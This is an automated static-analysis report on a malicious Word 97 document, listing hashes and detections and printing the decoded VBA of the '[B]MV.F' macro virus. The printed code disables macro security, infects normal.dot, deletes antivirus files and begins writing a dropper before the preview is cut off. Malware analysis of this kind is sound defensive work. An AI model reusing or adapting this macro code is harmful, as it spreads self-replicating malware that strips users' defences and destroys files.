Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 db6966ec7fcc5af7…

MALICIOUS

Office (OLE)

Size: 45.5 KB
Created: 1999-06-14 22:38:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: caa6e35a499f8895e16c4997b4a8fcce
SHA-1: bfa9fefb4ccbb33ee0aaba22f907ffeecdbd2050
SHA-256: db6966ec7fcc5af722caefda3cbb485249b0aebd0c5fcf294fecfad04bb747f4
Risk Score: 200

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

The file contains VBA macros that attempt to disable security features and execute code. The presence of the 'Shell()' call in VBA and ClamAV detections for 'Win.Trojan.Psycho-3' and 'Win.Trojan.wmvg-1' strongly indicate malicious intent. The macro code also attempts to modify the 'normal.dot' template, suggesting an effort to establish persistence or spread.

Heuristics 3

  • ClamAV: Win.Trojan.Psycho-3 (severity: critical, id: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Win.Trojan.Psycho-3
  • VBA macros detected (severity: medium, id: OLE_VBA_MACROS, 1 related finding)
    Document contains VBA macro code
  • Shell() call in VBA (severity: critical, id: OLE_VBA_SHELL)
    Shell() call in VBA

Extracted artifacts 1

Files carved from inside the sample during analysis.

  • Filename: macros.bas
    Kind: vba-macro
    Source: oletools.olevba.extract_macros (decoded VBA source)
    Size: 12155 bytes
    SHA-256: 50b4d48b9df86507b2d361e8f7bb6af244bbbaea38c39b13913a3f6b7b4cabf7
    Detection: ClamAV: Win.Trojan.wmvg-1
    Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "BMVf"
Sub BMVf() '[B]MV.f Module Infection - [Strain F of the [B]MV series!]
On Error Resume Next

If Application.Version = 9# Then ' two lines below from W2000M/PSD - I'll give VicodinES the credit for this!
    System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
    CommandBars("Macro").Controls("Security...").Enabled = False
End If

If Application.Version = 8# Then
    CommandBars("tools").Controls("Macro").Visible = False: CommandBars("tools").Controls("Customize...").Enabled = False: CommandBars("view").Controls("Toolbars").Enabled = False: CommandBars("view").Controls("Status Bar").Enabled = False
    Options.ConfirmConversions = False: Options.SaveNormalPrompt = False: Options.VirusProtection = False: Application.EnableCancelKey = wdCancelDisabled
End If

SetAttr "c:\program files\microsoft office\templates\normal.dot", vbNormal

ADInfected = False: NTInfected = False

For I = 1 To ActiveDocument.VBProject.VBComponents.Count
    If ActiveDocument.VBProject.VBComponents(I).Name = "BMVf" _
        Then
            ADInfected = True
    End If
Next I

For j = 1 To NormalTemplate.VBProject.VBComponents.Count
    If NormalTemplate.VBProject.VBComponents(j).Name = "BMVf" _
        Then
            NTInfected = True
            Application.Caption = "-=([B]MV.F)=-"
            Application.StatusBar = "-=([Bench] Macro Virus - Strain F)=-"
    End If
Next j

If ADInfected = False And NTInfected = False Then GoTo BMVf

If ADInfected = False Then
    NormalTemplate.VBProject.VBComponents("BMVf").Export "c:\system.sys"
    ActiveDocument.VBProject.VBComponents.Import "c:\system.sys"
    Kill "c:\system.sys"
End If

If NTInfected = False Then
    ActiveDocument.VBProject.VBComponents("BMVf").Export "c:\system.sys"
    NormalTemplate.VBProject.VBComponents.Import "c:\system.sys"
    Kill "c:\system.sys"
End If

BMVf:
If (InStr(1, ActiveDocument.Name, "Document") = False) Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End Sub
Sub FileSave()
On Error Resume Next
Kill "c:\program files\norton antivirus\Virscan2.dat"
Kill "c:\vdoc\*.*"
Kill "c:\f-prot\*.*"
'kill "C:\program files\antiviral toolkit pro\avp.key"
            Application.Caption = "-=([B]MV.F])=-"
            Application.StatusBar = "-=([B]MV.F)=- / SAiNTS ViRii Dept. - Test Version"
ActiveDocument.Save
End Sub
Sub ViewVBCode()
On Error Resume Next

Call BMVf

With Assistant.NewBalloon
    .Icon = msoIconAlert
    .Heading = "[Bench] Macro Virus - F"
    .Text = "You're not permitted to go there! Now you're gonna pay!"
    .Animation = msoAnimationSearching
    .Show
End With

ActiveDocument.Password = "[Bench]"
ActiveDocument.Close Savechages:=wdSaveChanges

Kill "c:\program files\norton antivirus\Virscan2.dat"
Kill "c:\vdoc\*.*"
Kill "c:\f-prot\*.*"
' Kill "C:\program files\antiviral toolkit pro\*.*"
ActiveDocument.Save

Open "c:\TNN_CIH.SCR" For Output As #1
Print #1, "N TNN_CIH.COM"
... (truncated)